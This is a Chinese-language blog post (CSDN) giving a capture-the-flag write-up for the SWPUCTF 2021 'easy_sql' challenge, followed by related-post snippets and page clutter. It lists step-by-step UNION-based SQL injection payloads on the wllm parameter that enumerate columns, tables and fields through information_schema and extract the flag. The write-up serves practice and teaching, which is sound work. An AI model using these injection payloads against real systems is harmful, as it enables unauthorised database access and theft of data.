SWPUCTF 2021 新生赛 easy_sql

最新推荐文章于 2024-08-14 11:26:43 发布
最新推荐文章于 2024-08-14 11:26:43 发布
阅读量566 收藏 9
点赞数 10
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K_kiii/article/details/135883239
版权
文章描述了一次针对数据库的SQL注入尝试过程,包括查看源代码中的参数、检测字段数、回显点查询、获取数据库表信息以及flag数据的提取。这些操作展示了攻击者试图获取敏感数据的技术手段。
摘要由CSDN通过智能技术生成

打开题目,先查看源代码,发现参数是wllm

先试一下 ?wllm=1

判断字段数

?wllm=1' order by 1/2/3 --+,发现到4不行,说明字段数为3

查看回显点

?wllm=-1' union select 1,2,3 --+

查看数据库信息

爆表

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db' --+

说明有两个表test_tb和users

先爆test_tb

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' --+

查flag

?wllm=-1' union select 1,2,group_concat(flag) from test_tb --+

K_kki
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 784
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
2021莲城杯比题包.zip
10-12
这个比很可能是一个网络安全技术挑战,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全竞模式,参者需要展示他们的信息安全技能,包括但不限于密码学、漏洞分析、逆向工程、网络侦查等。...
[SWPUCTF 2021 新生]easy_sql
2301_80358831的博客
04-18 390
[SWPUCTF 2021 新生]easy_sql 题目详解
【NSSCTF中SWPUCTF 2021新生easy_sql
AuroraMiraitowa的博客
01-30 425
wllm=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_name=‘test_db’–+wllm=-1’ union select 1,2,3–+(将id弄成一个负数的值,使前面的语句失效)然后看看union查询是否有回显位.6.接下来查询flag输入?
[SWPUCTF 2021 新生]easy_sql做题过程
heliar的博客
01-27 315
wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+查询表。wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。查看得知回显为wllm,试输入?
SWPUCTF 2021 新生]easy_sql
mcw_ai_biancheng的博客
02-19 426
1,2,3--+查看回显。
[SWPUCTF 2021 新生]easy_sql的WriteUp
2301_76435948的博客
10-22 1190
可以看到有列名为id,flag,说明flag极大可能在这个表中。一道简单的sql注入题,首先查看源代码,看看参数是啥。可知,我们需要用到参数wllm。3可以,4不行,说明字段数为3。先试试test_tb表。用wllm参数试一下。
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
2301_79326813的博客
02-10 944
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
Easy_draw.rar_easy _easy draw_easydraw
09-24
【标题】"Easy_draw.rar" 是一个压缩包文件,其中包含了一个名为 "easy draw" 或 "EasyDraw" 的简易图像处理软件。这个软件是专为编程初学者设计的,旨在帮助他们入门图形用户界面(GUI)开发和图像处理技术。 ...
easy_VM.rar_easy
09-23
本文将深入探讨一款名为“easy_VM.rar”的简易虚拟机,该虚拟机专为Windows操作系统设计,虽然功能相对简单,但其核心原理和实现方式对于理解虚拟化技术的基础概念具有重要意义。 “easy_VM.rar”是一款轻量级的...
easy_c.zip_easy
09-22
【标题】"easy_c.zip_easy" 是一个专为C语言初学者设计的压缩包,它包含了一系列简单的小型程序,旨在帮助初学者更好地理解和实践C编程基础。这些小程序的目的是让学习过程更加直观和易懂,使初学者能够通过实际操作...
Fujitsu.zip_easy _fujitsu
09-23
《Fujitsu_Easy_Kit试用手记_从入门到精通》 富士通(Fujitsu)是一家全球知名的IT企业,其产品线广泛,涵盖了硬件、软件和服务等多个领域。Fujitsu_Easy_Kit是富士通推出的一款便捷式解决方案,旨在简化用户的IT操作...
LeetCode_sql_day15(262.行程与用户)
Darling博客
08-08 1018
分解users表之后再进行连接会使题目迎刃而解。
Prostgresql的Timescaledb插件/扩展部署
weixin_45697805的博客
08-14 177
背景:研发需求,需要把docker部署得postgresql迁移到新的节点并要求再本地部署,提前查看数据库需要那些插件,并进行安装,docker部署的默认有插件。
net.sf.jsqlparser.statement.select.SelectItem
Rui_bbm的博客
08-09 414
今天一启动项目,出现了这个错误,仔细想了想,应该是昨天合并代码,导致的mybatis-plus版本冲突,以及分页PageHelper版本不兼容。可以看见这个我是最下边的 Caused by 报错信息,这个地方提示我。在我的项目中,common模块中mybatis-plus 重复导入依赖。在我的server模块中可以看见这个关于jsqlparser依赖。这个依赖是导致项目启动失败的根本原因,一定要将其注释。重新启动项目,可以看见已经可以正常启动!这里我直接将这个依赖注释掉防止重复依赖注入。
SQL Server 事务
a876106354的博客
08-09 569
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
SQL】用户注册率
最新发布
Frost_Descent的博客
08-14 570
round函数保留两位小数 round(count(contest_id)*100/(select count(user_id) from Users),2)所有用户都注册了 208、209 和 210 事,因此这些事的注册率为 100% ,我们按 contest_id 的降序排序加入结果表中。嵌套计算百分率 count(contest_id)*100/(select count(user_id) from Users)(contest_id, user_id) 是该表的主键(具有唯一值的列的组合)。
/var/opt/mssql/data/data
喝醉酒的小白
08-08 340
次数据文件可以用于存储数据库中其他数据表的数据,有助于分散数据存储,提高性能。如果你需要解析这些文件,通常需要使用SQL Server Management Studio (SSMS) 或者其他数据库管理工具来连接数据库,然后使用SQL查询来查看和操作数据库中的数据。如果你需要访问文件系统层面的文件内容,例如查看文件的元数据或内容摘要,可能需要使用文件系统命令或脚本。如果你需要进一步的帮助,比如如何使用SQL查询来获取特定数据表的信息,或者如何查看数据库文件的属性,请提供更多的上下文或具体需求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值